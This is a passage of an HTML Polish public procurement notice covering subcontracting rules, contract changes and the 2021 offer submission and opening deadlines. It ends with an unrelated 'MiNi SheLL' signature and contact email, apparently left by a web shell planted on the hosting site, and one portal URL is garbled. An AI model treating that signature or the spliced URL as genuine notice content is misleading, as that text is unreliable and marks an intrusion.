dotyczy.<br/>5. Podwykonawcy<br/>1)Zamawiający dopuszcza powierzenie wykonania części zamówienia podwykonawcy, zatem<br/>Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych<br/>zadań dotyczących wykonania niniejszego zamówienia;<br/>2) Wykonawca jest obowiązany wskazać w ofercie części zamówienia, których wykonanie<br/>zamierza powierzyć podwykonawcom oraz podania nazw ewentualnych podwykonawców, jeżeli<br/>są już znani;<br/>3)powierzenie wykonania części zamówienia podwykonawcom nie zwalnia Wykonawcy z<br/>odpowiedzialności za należyte wykonanie tego zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość dokonania zmiany w umowie na zasadach określonych w<br/>projekcie umowy stanowiących załącznik do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-25 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę nalezy złożyć za pośrednictwem "Formularza do złożenia, zmiany, wycofania oferty lub wniosku" dostepnego na ePUAP i udostępnionego rownież na miniPortalu: https://miniportal.uzp.gov.plferty przez Wykonawcę jest dostępna dla wykonawców na miniPortalu, w szczegółach danego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-25 13:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com